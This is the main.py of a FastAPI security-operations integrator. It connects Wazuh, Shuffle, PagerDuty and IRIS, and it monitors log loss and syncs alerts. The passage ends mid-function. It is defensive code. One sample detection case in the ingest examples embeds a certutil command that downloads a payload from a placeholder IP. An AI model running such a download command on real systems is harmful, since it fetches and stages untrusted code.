Няма описание

main.py 96KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516616716816917017117217317417517617717817918018118218318418518618718818919019119219319419519619719819920020120220320420520620720820921021121221321421521621721821922022122222322422522622722822923023123223323423523623723823924024124224324424524624724824925025125225325425525625725825926026126226326426526626726826927027127227327427527627727827928028128228328428528628728828929029129229329429529629729829930030130230330430530630730830931031131231331431531631731831932032132232332432532632732832933033133233333433533633733833934034134234334434534634734834935035135235335435535635735835936036136236336436536636736836937037137237337437537637737837938038138238338438538638738838939039139239339439539639739839940040140240340440540640740840941041141241341441541641741841942042142242342442542642742842943043143243343443543643743843944044144244344444544644744844945045145245345445545645745845946046146246346446546646746846947047147247347447547647747847948048148248348448548648748848949049149249349449549649749849950050150250350450550650750850951051151251351451551651751851952052152252352452552652752852953053153253353453553653753853954054154254354454554654754854955055155255355455555655755855956056156256356456556656756856957057157257357457557657757857958058158258358458558658758858959059159259359459559659759859960060160260360460560660760860961061161261361461561661761861962062162262362462562662762862963063163263363463563663763863964064164264364464564664764864965065165265365465565665765865966066166266366466566666766866967067167267367467567667767867968068168268368468568668768868969069169269369469569669769869970070170270370470570670770870971071171271371471571671771871972072172272372472572672772872973073173273373473573673773873974074174274374474574674774874975075175275375475575675775875976076176276376476576676776876977077177277377477577677777877978078178278378478578678778878979079179279379479579679779879980080180280380480580680780880981081181281381481581681781881982082182282382482582682782882983083183283383483583683783883984084184284384484584684784884985085185285385485585685785885986086186286386486586686786886987087187287387487587687787887988088188288388488588688788888989089189289389489589689789889990090190290390490590690790890991091191291391491591691791891992092192292392492592692792892993093193293393493593693793893994094194294394494594694794894995095195295395495595695795895996096196296396496596696796896997097197297397497597697797897998098198298398498598698798898999099199299399499599699799899910001001100210031004100510061007100810091010101110121013101410151016101710181019102010211022102310241025102610271028102910301031103210331034103510361037103810391040104110421043104410451046104710481049105010511052105310541055105610571058105910601061106210631064106510661067106810691070107110721073107410751076107710781079108010811082108310841085108610871088108910901091109210931094109510961097109810991100110111021103110411051106110711081109111011111112111311141115111611171118111911201121112211231124112511261127112811291130113111321133113411351136113711381139114011411142114311441145114611471148114911501151115211531154115511561157115811591160116111621163116411651166116711681169117011711172117311741175117611771178117911801181118211831184118511861187118811891190119111921193119411951196119711981199120012011202120312041205120612071208120912101211121212131214121512161217121812191220122112221223122412251226122712281229123012311232123312341235123612371238123912401241124212431244124512461247124812491250125112521253125412551256125712581259126012611262126312641265126612671268126912701271127212731274127512761277127812791280128112821283128412851286128712881289129012911292129312941295129612971298129913001301130213031304130513061307130813091310131113121313131413151316131713181319132013211322132313241325132613271328132913301331133213331334133513361337133813391340134113421343134413451346134713481349135013511352135313541355135613571358135913601361136213631364136513661367136813691370137113721373137413751376137713781379138013811382138313841385138613871388138913901391139213931394139513961397139813991400140114021403140414051406140714081409141014111412141314141415141614171418141914201421142214231424142514261427142814291430143114321433143414351436143714381439144014411442144314441445144614471448144914501451145214531454145514561457145814591460146114621463146414651466146714681469147014711472147314741475147614771478147914801481148214831484148514861487148814891490149114921493149414951496149714981499150015011502150315041505150615071508150915101511151215131514151515161517151815191520152115221523152415251526152715281529153015311532153315341535153615371538153915401541154215431544154515461547154815491550155115521553155415551556155715581559156015611562156315641565156615671568156915701571157215731574157515761577157815791580158115821583158415851586158715881589159015911592159315941595159615971598159916001601160216031604160516061607160816091610161116121613161416151616161716181619162016211622162316241625162616271628162916301631163216331634163516361637163816391640164116421643164416451646164716481649165016511652165316541655165616571658165916601661166216631664166516661667166816691670167116721673167416751676167716781679168016811682168316841685168616871688168916901691169216931694169516961697169816991700170117021703170417051706170717081709171017111712171317141715171617171718171917201721172217231724172517261727172817291730173117321733173417351736173717381739174017411742174317441745174617471748174917501751175217531754175517561757175817591760176117621763176417651766176717681769177017711772177317741775177617771778177917801781178217831784178517861787178817891790179117921793179417951796179717981799180018011802180318041805180618071808180918101811181218131814181518161817181818191820182118221823182418251826182718281829183018311832183318341835183618371838183918401841184218431844184518461847184818491850185118521853185418551856185718581859186018611862186318641865186618671868186918701871187218731874187518761877187818791880188118821883188418851886188718881889189018911892189318941895189618971898189919001901190219031904190519061907190819091910191119121913191419151916191719181919192019211922192319241925192619271928192919301931193219331934193519361937193819391940194119421943194419451946194719481949195019511952195319541955195619571958195919601961196219631964196519661967196819691970197119721973197419751976197719781979198019811982198319841985198619871988198919901991199219931994199519961997199819992000200120022003200420052006200720082009201020112012201320142015201620172018201920202021202220232024202520262027202820292030203120322033203420352036203720382039204020412042204320442045204620472048204920502051205220532054205520562057205820592060206120622063206420652066206720682069207020712072207320742075207620772078207920802081208220832084208520862087208820892090209120922093209420952096209720982099210021012102210321042105210621072108210921102111211221132114211521162117211821192120212121222123212421252126212721282129213021312132213321342135213621372138213921402141214221432144214521462147214821492150215121522153215421552156215721582159216021612162216321642165216621672168216921702171217221732174217521762177217821792180218121822183218421852186218721882189219021912192219321942195219621972198219922002201220222032204220522062207220822092210221122122213221422152216221722182219222022212222222322242225222622272228222922302231223222332234223522362237223822392240224122422243224422452246224722482249225022512252225322542255225622572258225922602261226222632264226522662267226822692270227122722273227422752276227722782279228022812282228322842285228622872288228922902291229222932294229522962297229822992300230123022303230423052306230723082309231023112312231323142315231623172318231923202321232223232324232523262327232823292330233123322333233423352336233723382339234023412342234323442345234623472348234923502351235223532354235523562357235823592360236123622363236423652366236723682369237023712372237323742375237623772378237923802381238223832384238523862387238823892390239123922393239423952396239723982399240024012402240324042405240624072408240924102411241224132414241524162417241824192420242124222423242424252426242724282429243024312432243324342435243624372438243924402441244224432444244524462447244824492450245124522453245424552456245724582459246024612462246324642465246624672468246924702471247224732474247524762477247824792480248124822483248424852486248724882489249024912492249324942495249624972498249925002501250225032504250525062507250825092510251125122513251425152516251725182519252025212522252325242525252625272528252925302531253225332534253525362537253825392540254125422543254425452546254725482549255025512552255325542555255625572558255925602561256225632564256525662567256825692570257125722573257425752576257725782579258025812582258325842585258625872588258925902591259225932594259525962597259825992600260126022603260426052606260726082609261026112612261326142615261626172618261926202621262226232624262526262627262826292630263126322633263426352636263726382639264026412642264326442645264626472648264926502651265226532654265526562657265826592660266126622663
  1. import asyncio
  2. import logging
  3. import os
  4. import re
  5. import shlex
  6. import subprocess
  7. import uuid
  8. from collections import deque
  9. from datetime import datetime, timedelta, timezone
  10. from pathlib import Path
  11. from psycopg import sql
  12. from fastapi import Depends, FastAPI, File, HTTPException, Request, UploadFile
  13. import csv
  14. import io
  15. from fastapi.responses import FileResponse, Response, StreamingResponse
  16. from fastapi.staticfiles import StaticFiles
  17. from app.adapters.abuseipdb import AbuseIpdbAdapter
  18. from app.adapters.geoip import GeoIpAdapter
  19. from app.adapters.iris import IrisAdapter
  20. from app.adapters.pagerduty import PagerDutyAdapter
  21. from app.adapters.shuffle import ShuffleAdapter
  22. from app.adapters.virustotal import VirusTotalAdapter
  23. from app.adapters.wazuh import WazuhAdapter
  24. from app.config import settings
  25. from app.db import get_conn, init_schema
  26. from app.models import (
  27. ActionCreateIncidentRequest,
  28. ApiResponse,
  29. CDetectionEvaluateRequest,
  30. IocEnrichRequest,
  31. IocEvaluateRequest,
  32. IrisAlertCreateRequest,
  33. IrisTicketCreateRequest,
  34. LogLossCheckRequest,
  35. LogLossStreamCheck,
  36. SimLogRunRequest,
  37. ShuffleLoginRequest,
  38. ShuffleProxyRequest,
  39. TriggerShuffleRequest,
  40. WazuhIngestRequest,
  41. )
  42. from app.repositories.mvp_repo import MvpRepository
  43. from app.routes.mvp import build_mvp_router
  44. from app.security import require_internal_api_key
  45. from app.services.mvp_service import MvpService
  46. from app.services.c_detection_service import CDetectionService
  47. app = FastAPI(title=settings.app_name, version="0.1.0")
  48. logger = logging.getLogger(__name__)
  49. UI_DIR = Path(__file__).resolve().parent / "ui"
  50. UI_ASSETS_DIR = UI_DIR / "assets"
  51. SIM_SCRIPTS_DIR = Path("/app/scripts")
  52. SIM_RUN_LOGS_DIR = Path("/tmp/soc-integrator-sim-logs")
  53. wazuh_adapter = WazuhAdapter(
  54. base_url=settings.wazuh_base_url,
  55. username=settings.wazuh_username,
  56. password=settings.wazuh_password,
  57. indexer_url=settings.wazuh_indexer_url,
  58. indexer_username=settings.wazuh_indexer_username,
  59. indexer_password=settings.wazuh_indexer_password,
  60. )
  61. shuffle_adapter = ShuffleAdapter(
  62. base_url=settings.shuffle_base_url,
  63. api_key=settings.shuffle_api_key,
  64. )
  65. pagerduty_adapter = PagerDutyAdapter(
  66. base_url=settings.pagerduty_base_url,
  67. api_key=settings.pagerduty_api_key,
  68. )
  69. iris_adapter = IrisAdapter(
  70. base_url=settings.iris_base_url,
  71. api_key=settings.iris_api_key,
  72. )
  73. virustotal_adapter = VirusTotalAdapter(
  74. base_url=settings.virustotal_base_url,
  75. api_key=settings.virustotal_api_key,
  76. )
  77. abuseipdb_adapter = AbuseIpdbAdapter(
  78. base_url=settings.abuseipdb_base_url,
  79. api_key=settings.abuseipdb_api_key,
  80. )
  81. geoip_adapter = GeoIpAdapter(
  82. provider=settings.geoip_provider,
  83. cache_ttl_seconds=settings.geoip_cache_ttl_seconds,
  84. )
  85. repo = MvpRepository()
  86. mvp_service = MvpService(
  87. repo=repo,
  88. wazuh_adapter=wazuh_adapter,
  89. shuffle_adapter=shuffle_adapter,
  90. iris_adapter=iris_adapter,
  91. pagerduty_adapter=pagerduty_adapter,
  92. )
  93. c_detection_service = CDetectionService(
  94. repo=repo,
  95. geoip_adapter=geoip_adapter,
  96. )
  97. app.include_router(build_mvp_router(mvp_service, require_internal_api_key))
  98. app.mount("/ui/assets", StaticFiles(directory=str(UI_ASSETS_DIR)), name="ui-assets")
  99. @app.middleware("http")
  100. async def ui_no_cache_middleware(request: Request, call_next):
  101. response: Response = await call_next(request)
  102. if request.url.path == "/ui" or request.url.path.startswith("/ui/assets/"):
  103. response.headers["Cache-Control"] = "no-store, no-cache, must-revalidate, max-age=0"
  104. response.headers["Pragma"] = "no-cache"
  105. response.headers["Expires"] = "0"
  106. return response
  107. DEFAULT_LOG_LOSS_STREAMS: list[dict[str, object]] = [
  108. {
  109. "name": "fortigate",
  110. "query": "full_log:fortigate OR full_log:FGT80F OR full_log:FGT60F OR full_log:FGT40F OR full_log:FGT501E",
  111. "min_count": 1,
  112. },
  113. {
  114. "name": "windows_agent",
  115. "query": "full_log:windows_agent OR full_log:windows",
  116. "min_count": 1,
  117. },
  118. {
  119. "name": "vmware",
  120. "query": "full_log:vmware",
  121. "min_count": 1,
  122. },
  123. {
  124. "name": "log_monitor",
  125. "query": "full_log:log_monitor OR rule.id:100411",
  126. "min_count": 1,
  127. },
  128. ]
  129. async def _execute_log_loss_check(
  130. req: LogLossCheckRequest,
  131. create_ticket: bool,
  132. ) -> dict[str, object]:
  133. minutes = max(1, int(req.minutes))
  134. streams = req.streams or [LogLossStreamCheck(**item) for item in DEFAULT_LOG_LOSS_STREAMS]
  135. items: list[dict[str, object]] = []
  136. loss_count = 0
  137. error_count = 0
  138. loss_stream_names: list[str] = []
  139. for stream in streams:
  140. min_count = max(0, int(stream.min_count))
  141. try:
  142. observed = await wazuh_adapter.count_alerts(query=stream.query, minutes=minutes)
  143. is_loss = observed < min_count
  144. if is_loss:
  145. loss_count += 1
  146. loss_stream_names.append(stream.name)
  147. items.append(
  148. {
  149. "name": stream.name,
  150. "query": stream.query,
  151. "minutes": minutes,
  152. "min_count": min_count,
  153. "observed_count": observed,
  154. "status": "loss" if is_loss else "ok",
  155. }
  156. )
  157. except Exception as exc:
  158. error_count += 1
  159. items.append(
  160. {
  161. "name": stream.name,
  162. "query": stream.query,
  163. "minutes": minutes,
  164. "min_count": min_count,
  165. "observed_count": None,
  166. "status": "error",
  167. "error": str(exc),
  168. }
  169. )
  170. summary = {
  171. "total_streams": len(items),
  172. "loss_streams": loss_count,
  173. "error_streams": error_count,
  174. "all_ok": loss_count == 0 and error_count == 0,
  175. }
  176. ticket_data: dict[str, object] | None = None
  177. if create_ticket and loss_count > 0:
  178. cooldown = max(0, int(settings.log_loss_monitor_ticket_cooldown_seconds))
  179. now_ts = datetime.now(timezone.utc).timestamp()
  180. state = app.state.log_loss_monitor_state
  181. last_ticket_ts = float(state.get("last_ticket_ts", 0.0) or 0.0)
  182. in_cooldown = cooldown > 0 and (now_ts - last_ticket_ts) < cooldown
  183. if not in_cooldown:
  184. title = f"Log loss detected ({loss_count} stream(s))"
  185. description = (
  186. f"Log-loss monitor detected missing telemetry in the last {minutes} minute(s). "
  187. f"Affected streams: {', '.join(loss_stream_names)}."
  188. )
  189. case_payload = {
  190. "case_name": title,
  191. "case_description": description,
  192. "case_customer": settings.iris_default_customer_id,
  193. "case_soc_id": settings.iris_default_soc_id,
  194. }
  195. try:
  196. iris_result = await iris_adapter.create_case(case_payload)
  197. state["last_ticket_ts"] = now_ts
  198. ticket_data = {"created": True, "iris": iris_result}
  199. except Exception as exc:
  200. ticket_data = {"created": False, "error": str(exc)}
  201. else:
  202. ticket_data = {
  203. "created": False,
  204. "skipped": "cooldown_active",
  205. "cooldown_seconds": cooldown,
  206. "last_ticket_ts": last_ticket_ts,
  207. }
  208. result: dict[str, object] = {
  209. "checked_at": datetime.now(timezone.utc).isoformat(),
  210. "minutes": minutes,
  211. "summary": summary,
  212. "streams": items,
  213. }
  214. if ticket_data is not None:
  215. result["ticket"] = ticket_data
  216. return result
  217. async def _log_loss_monitor_loop() -> None:
  218. interval = max(5, int(settings.log_loss_monitor_interval_seconds))
  219. while True:
  220. started_at = datetime.now(timezone.utc).isoformat()
  221. try:
  222. app.state.log_loss_monitor_state["running"] = True
  223. app.state.log_loss_monitor_state["last_started_at"] = started_at
  224. req = LogLossCheckRequest(minutes=max(1, int(settings.log_loss_monitor_window_minutes)))
  225. result = await _execute_log_loss_check(
  226. req=req,
  227. create_ticket=bool(settings.log_loss_monitor_create_iris_ticket),
  228. )
  229. app.state.log_loss_monitor_state["last_status"] = "ok"
  230. app.state.log_loss_monitor_state["last_result"] = result
  231. app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  232. logger.info(
  233. "log-loss monitor checked=%s loss=%s errors=%s",
  234. result.get("summary", {}).get("total_streams", 0),
  235. result.get("summary", {}).get("loss_streams", 0),
  236. result.get("summary", {}).get("error_streams", 0),
  237. )
  238. except Exception as exc:
  239. app.state.log_loss_monitor_state["last_status"] = "error"
  240. app.state.log_loss_monitor_state["last_error"] = str(exc)
  241. app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  242. logger.exception("log-loss monitor failed: %s", exc)
  243. finally:
  244. app.state.log_loss_monitor_state["running"] = False
  245. await asyncio.sleep(interval)
  246. async def _wazuh_auto_sync_loop() -> None:
  247. interval = max(5, int(settings.wazuh_auto_sync_interval_seconds))
  248. while True:
  249. started_at = datetime.now(timezone.utc).isoformat()
  250. try:
  251. app.state.wazuh_auto_sync_state["running"] = True
  252. app.state.wazuh_auto_sync_state["last_started_at"] = started_at
  253. result = await mvp_service.sync_wazuh_alerts(
  254. query=settings.wazuh_auto_sync_query,
  255. limit=settings.wazuh_auto_sync_limit,
  256. minutes=settings.wazuh_auto_sync_minutes,
  257. )
  258. app.state.wazuh_auto_sync_state["last_status"] = "ok"
  259. app.state.wazuh_auto_sync_state["last_result"] = result
  260. app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  261. logger.info(
  262. "wazuh auto-sync processed=%s ingested=%s skipped=%s failed=%s ioc_evaluated=%s ioc_matched=%s ioc_rejected=%s",
  263. result.get("processed", 0),
  264. result.get("ingested", 0),
  265. result.get("skipped_existing", 0),
  266. result.get("failed", 0),
  267. result.get("ioc_evaluated", 0),
  268. result.get("ioc_matched", 0),
  269. result.get("ioc_rejected", 0),
  270. )
  271. except Exception as exc:
  272. app.state.wazuh_auto_sync_state["last_status"] = "error"
  273. app.state.wazuh_auto_sync_state["last_error"] = str(exc)
  274. app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  275. logger.exception("wazuh auto-sync failed: %s", exc)
  276. finally:
  277. app.state.wazuh_auto_sync_state["running"] = False
  278. await asyncio.sleep(interval)
  279. def _c_match_to_incident_event(match: dict[str, object]) -> dict[str, object]:
  280. event = dict(match.get("event") or {})
  281. usecase_id = str(match.get("usecase_id") or "C-unknown")
  282. section = str(match.get("section") or "c")
  283. severity = str(match.get("severity") or "medium")
  284. entity = str(match.get("entity") or "unknown")
  285. evidence = dict(match.get("evidence") or {})
  286. source = str(event.get("source") or "wazuh")
  287. timestamp = str(event.get("timestamp") or datetime.now(timezone.utc).isoformat())
  288. event_id = str(event.get("event_id") or f"{usecase_id}-{int(datetime.now(timezone.utc).timestamp())}")
  289. payload = dict(event.get("payload") or {})
  290. asset = dict(event.get("asset") or {})
  291. network = dict(event.get("network") or {})
  292. event_type = "c2_credential_abuse"
  293. if section == "c1":
  294. event_type = "c1_impossible_travel"
  295. elif section == "c3":
  296. event_type = "c3_lateral_movement"
  297. title = f"{usecase_id} detection for {entity}"
  298. description = f"{usecase_id} matched for entity={entity}. evidence={evidence}"
  299. tags = list(event.get("tags") or [])
  300. tags.extend(["appendix_c", usecase_id.lower(), section])
  301. return {
  302. "source": source,
  303. "event_type": event_type,
  304. "event_id": event_id,
  305. "timestamp": timestamp,
  306. "severity": severity,
  307. "title": title,
  308. "description": description,
  309. "asset": asset,
  310. "network": network,
  311. "tags": sorted(set(tags)),
  312. "risk_context": {"appendix_c_usecase": usecase_id},
  313. "raw": event.get("raw") or {},
  314. "payload": payload,
  315. }
  316. @app.on_event("startup")
  317. async def startup() -> None:
  318. init_schema()
  319. repo.ensure_policy()
  320. app.state.wazuh_auto_sync_state = {
  321. "running": False,
  322. "last_status": None,
  323. "last_started_at": None,
  324. "last_finished_at": None,
  325. "last_error": None,
  326. "last_result": None,
  327. }
  328. app.state.log_loss_monitor_state = {
  329. "running": False,
  330. "last_status": None,
  331. "last_started_at": None,
  332. "last_finished_at": None,
  333. "last_error": None,
  334. "last_result": None,
  335. "last_ticket_ts": 0.0,
  336. }
  337. app.state.c_detection_state = {
  338. "last_status": None,
  339. "last_started_at": None,
  340. "last_finished_at": None,
  341. "last_error": None,
  342. "last_result": None,
  343. "last_ticket_ts_by_key": {},
  344. }
  345. app.state.systems_monitor_state = {
  346. "last_ok_at": {},
  347. }
  348. app.state.sim_runs = {}
  349. SIM_RUN_LOGS_DIR.mkdir(parents=True, exist_ok=True)
  350. if settings.wazuh_auto_sync_enabled:
  351. app.state.wazuh_auto_sync_task = asyncio.create_task(_wazuh_auto_sync_loop())
  352. logger.info(
  353. "wazuh auto-sync enabled interval=%ss limit=%s minutes=%s query=%s",
  354. settings.wazuh_auto_sync_interval_seconds,
  355. settings.wazuh_auto_sync_limit,
  356. settings.wazuh_auto_sync_minutes,
  357. settings.wazuh_auto_sync_query,
  358. )
  359. if settings.log_loss_monitor_enabled:
  360. app.state.log_loss_monitor_task = asyncio.create_task(_log_loss_monitor_loop())
  361. logger.info(
  362. "log-loss monitor enabled interval=%ss window=%sm create_iris_ticket=%s cooldown=%ss",
  363. settings.log_loss_monitor_interval_seconds,
  364. settings.log_loss_monitor_window_minutes,
  365. settings.log_loss_monitor_create_iris_ticket,
  366. settings.log_loss_monitor_ticket_cooldown_seconds,
  367. )
  368. @app.on_event("shutdown")
  369. async def shutdown() -> None:
  370. task = getattr(app.state, "wazuh_auto_sync_task", None)
  371. if task:
  372. task.cancel()
  373. try:
  374. await task
  375. except asyncio.CancelledError:
  376. pass
  377. ll_task = getattr(app.state, "log_loss_monitor_task", None)
  378. if ll_task:
  379. ll_task.cancel()
  380. try:
  381. await ll_task
  382. except asyncio.CancelledError:
  383. pass
  384. sim_runs = getattr(app.state, "sim_runs", {})
  385. for run in sim_runs.values():
  386. process = run.get("process")
  387. if process and process.poll() is None:
  388. process.terminate()
  389. @app.get(
  390. "/ui",
  391. summary="SOC Integrator UI",
  392. description="Serve the built-in Alpine.js operations console.",
  393. include_in_schema=False,
  394. )
  395. async def ui_index() -> FileResponse:
  396. if not UI_DIR.exists():
  397. raise HTTPException(status_code=404, detail="UI is not available in this build")
  398. return FileResponse(UI_DIR / "index.html")
  399. @app.get(
  400. "/health",
  401. response_model=ApiResponse,
  402. summary="Service health",
  403. description="Return soc-integrator service identity and configured upstream targets.",
  404. )
  405. async def health() -> ApiResponse:
  406. return ApiResponse(
  407. data={
  408. "service": settings.app_name,
  409. "env": settings.app_env,
  410. "targets": {
  411. "wazuh": settings.wazuh_base_url,
  412. "shuffle": settings.shuffle_base_url,
  413. "pagerduty": settings.pagerduty_base_url,
  414. "iris": settings.iris_base_url,
  415. },
  416. }
  417. )
  418. def _build_wazuh_hit_from_ingest(payload: WazuhIngestRequest) -> dict[str, object]:
  419. src_payload = dict(payload.payload or {})
  420. src_payload.setdefault("@timestamp", datetime.now(timezone.utc).isoformat())
  421. src_payload.setdefault("id", payload.alert_id)
  422. src_payload.setdefault(
  423. "rule",
  424. {
  425. "id": payload.rule_id or "unknown",
  426. "level": payload.severity if payload.severity is not None else 5,
  427. "description": payload.title or "Wazuh alert",
  428. },
  429. )
  430. return {"_id": payload.alert_id or f"wazuh-{uuid.uuid4().hex[:12]}", "_source": src_payload}
  431. def _normalize_wazuh_ingest_payload(payload: WazuhIngestRequest) -> dict[str, object]:
  432. normalized = {
  433. "source": payload.source,
  434. "alert_id": payload.alert_id,
  435. "rule_id": payload.rule_id,
  436. "severity": payload.severity,
  437. "title": payload.title,
  438. "payload": payload.payload,
  439. }
  440. hit = _build_wazuh_hit_from_ingest(payload)
  441. normalized_event = mvp_service.normalize_wazuh_hit(hit)
  442. return {
  443. "normalized": normalized,
  444. "normalized_event": normalized_event,
  445. }
  446. @app.post(
  447. "/ingest/wazuh-alert",
  448. response_model=ApiResponse,
  449. summary="Normalize Wazuh alert",
  450. description="Normalize a raw Wazuh alert payload into both legacy ingest shape and SOC normalized event shape.",
  451. )
  452. async def ingest_wazuh_alert(payload: WazuhIngestRequest) -> ApiResponse:
  453. return ApiResponse(data=_normalize_wazuh_ingest_payload(payload))
  454. @app.get(
  455. "/ingest/wazuh-alert/samples",
  456. response_model=ApiResponse,
  457. summary="Sample normalization cases",
  458. description="Return sample Wazuh event-log cases with expected normalized output for testing and integration.",
  459. )
  460. async def ingest_wazuh_alert_samples() -> ApiResponse:
  461. sample_payloads = [
  462. WazuhIngestRequest(
  463. source="wazuh",
  464. rule_id="110302",
  465. alert_id="sample-a1-02",
  466. severity=8,
  467. title="A1 production: DNS IOC domain match event",
  468. payload={
  469. "@timestamp": datetime.now(timezone.utc).isoformat(),
  470. "full_log": "Mar 04 09:42:24 dns-fw-01 soc_mvp_test=true source=dns severity=medium event_type=ioc_domain_match src_ip=10.12.132.85 ioc_type=domain ioc_value=ioc-2080.malicious.example feed=threatintel_main confidence=high action=alert",
  471. "agent": {"name": "dns-fw-01", "id": "001"},
  472. },
  473. ),
  474. WazuhIngestRequest(
  475. source="wazuh",
  476. rule_id="110402",
  477. alert_id="sample-b1-02",
  478. severity=8,
  479. title="B1 production: ESXi SSH enabled",
  480. payload={
  481. "@timestamp": datetime.now(timezone.utc).isoformat(),
  482. "full_log": "Mar 04 09:42:28 esxi-01 soc_mvp_test=true source=vmware severity=medium event_type=vmware_esxi_enable_ssh action=enable service=ssh user=root host=esxi-01 src_ip=203.0.113.115",
  483. "agent": {"name": "esxi-01", "id": "002"},
  484. },
  485. ),
  486. WazuhIngestRequest(
  487. source="wazuh",
  488. rule_id="110426",
  489. alert_id="sample-b3-06",
  490. severity=8,
  491. title="B3 production: CertUtil download pattern",
  492. payload={
  493. "@timestamp": datetime.now(timezone.utc).isoformat(),
  494. "full_log": "Mar 04 09:42:35 win-sysmon-01 soc_mvp_test=true source=windows_sysmon severity=medium event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\" src_ip=10.10.10.5",
  495. "agent": {"name": "win-sysmon-01", "id": "003"},
  496. },
  497. ),
  498. WazuhIngestRequest(
  499. source="wazuh",
  500. rule_id="110501",
  501. alert_id="sample-c1-01",
  502. severity=12,
  503. title="C1 production: Impossible travel",
  504. payload={
  505. "@timestamp": datetime.now(timezone.utc).isoformat(),
  506. "full_log": "Mar 04 09:44:10 fgt-vpn-01 source=vpn severity=high event_type=vpn_login_success event_id=4624 success=true user=alice.admin src_ip=8.8.8.8 country=US src_lat=37.3861 src_lon=-122.0839 dst_host=vpn-gw-01",
  507. "agent": {"name": "fgt-vpn-01", "id": "004"},
  508. },
  509. ),
  510. ]
  511. cases = []
  512. for item in sample_payloads:
  513. cases.append(
  514. {
  515. "name": str(item.alert_id),
  516. "request": item.model_dump(mode="json"),
  517. "result": _normalize_wazuh_ingest_payload(item),
  518. }
  519. )
  520. return ApiResponse(data={"cases": cases, "count": len(cases)})
  521. @app.post(
  522. "/action/create-incident",
  523. response_model=ApiResponse,
  524. summary="Create PagerDuty incident",
  525. description="Create an incident in PagerDuty (stub or real integration) from request payload.",
  526. )
  527. async def create_incident(payload: ActionCreateIncidentRequest) -> ApiResponse:
  528. incident_payload = {
  529. "title": payload.title,
  530. "urgency": payload.severity,
  531. "incident_key": payload.dedupe_key,
  532. "body": payload.payload,
  533. "source": payload.source,
  534. }
  535. try:
  536. pd_result = await pagerduty_adapter.create_incident(incident_payload)
  537. except Exception as exc:
  538. raise HTTPException(status_code=502, detail=f"PagerDuty call failed: {exc}") from exc
  539. return ApiResponse(data={"pagerduty": pd_result})
  540. @app.post(
  541. "/action/trigger-shuffle",
  542. response_model=ApiResponse,
  543. summary="Trigger Shuffle workflow",
  544. description="Execute a Shuffle workflow by ID with execution_argument payload.",
  545. )
  546. async def trigger_shuffle(payload: TriggerShuffleRequest) -> ApiResponse:
  547. try:
  548. shuffle_result = await shuffle_adapter.trigger_workflow(
  549. workflow_id=payload.workflow_id,
  550. payload=payload.execution_argument,
  551. )
  552. except Exception as exc:
  553. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  554. return ApiResponse(data={"shuffle": shuffle_result})
  555. @app.get(
  556. "/shuffle/health",
  557. response_model=ApiResponse,
  558. summary="Shuffle health",
  559. description="Check Shuffle backend health endpoint through adapter connectivity.",
  560. )
  561. async def shuffle_health() -> ApiResponse:
  562. try:
  563. result = await shuffle_adapter.health()
  564. except Exception as exc:
  565. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  566. return ApiResponse(data={"shuffle": result})
  567. @app.get(
  568. "/shuffle/auth-test",
  569. response_model=ApiResponse,
  570. summary="Shuffle auth test",
  571. description="Validate Shuffle API key authentication.",
  572. )
  573. async def shuffle_auth_test() -> ApiResponse:
  574. try:
  575. result = await shuffle_adapter.auth_test()
  576. except Exception as exc:
  577. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  578. return ApiResponse(data={"shuffle": result})
  579. @app.post(
  580. "/shuffle/login",
  581. response_model=ApiResponse,
  582. summary="Shuffle login",
  583. description="Login to Shuffle with username/password and return auth response.",
  584. )
  585. async def shuffle_login(payload: ShuffleLoginRequest) -> ApiResponse:
  586. try:
  587. result = await shuffle_adapter.login(payload.username, payload.password)
  588. except Exception as exc:
  589. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  590. return ApiResponse(data={"shuffle": result})
  591. @app.post(
  592. "/shuffle/generate-apikey",
  593. response_model=ApiResponse,
  594. summary="Generate Shuffle API key",
  595. description="Login using provided or configured credentials and generate a Shuffle API key.",
  596. )
  597. async def shuffle_generate_apikey(payload: ShuffleLoginRequest | None = None) -> ApiResponse:
  598. username = payload.username if payload else settings.shuffle_username
  599. password = payload.password if payload else settings.shuffle_password
  600. if not username or not password:
  601. raise HTTPException(
  602. status_code=400,
  603. detail="Missing shuffle credentials. Provide username/password in body or set SHUFFLE_USERNAME and SHUFFLE_PASSWORD.",
  604. )
  605. try:
  606. result = await shuffle_adapter.generate_apikey_from_login(username, password)
  607. except Exception as exc:
  608. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  609. return ApiResponse(data={"shuffle": result})
  610. @app.get(
  611. "/shuffle/workflows",
  612. response_model=ApiResponse,
  613. summary="List Shuffle workflows",
  614. description="List available workflows in Shuffle using configured API key.",
  615. )
  616. async def shuffle_workflows() -> ApiResponse:
  617. try:
  618. result = await shuffle_adapter.list_workflows()
  619. except Exception as exc:
  620. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  621. return ApiResponse(data={"shuffle": result})
  622. @app.get(
  623. "/shuffle/workflows/{workflow_id}",
  624. response_model=ApiResponse,
  625. summary="Get Shuffle workflow",
  626. description="Get a single Shuffle workflow definition by workflow ID.",
  627. )
  628. async def shuffle_workflow(workflow_id: str) -> ApiResponse:
  629. try:
  630. result = await shuffle_adapter.get_workflow(workflow_id)
  631. except Exception as exc:
  632. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  633. return ApiResponse(data={"shuffle": result})
  634. @app.post(
  635. "/shuffle/workflows/{workflow_id}/execute",
  636. response_model=ApiResponse,
  637. summary="Execute Shuffle workflow",
  638. description="Execute a specific Shuffle workflow with custom JSON payload.",
  639. )
  640. async def shuffle_workflow_execute(
  641. workflow_id: str, payload: dict[str, object]
  642. ) -> ApiResponse:
  643. try:
  644. result = await shuffle_adapter.trigger_workflow(workflow_id=workflow_id, payload=payload)
  645. except Exception as exc:
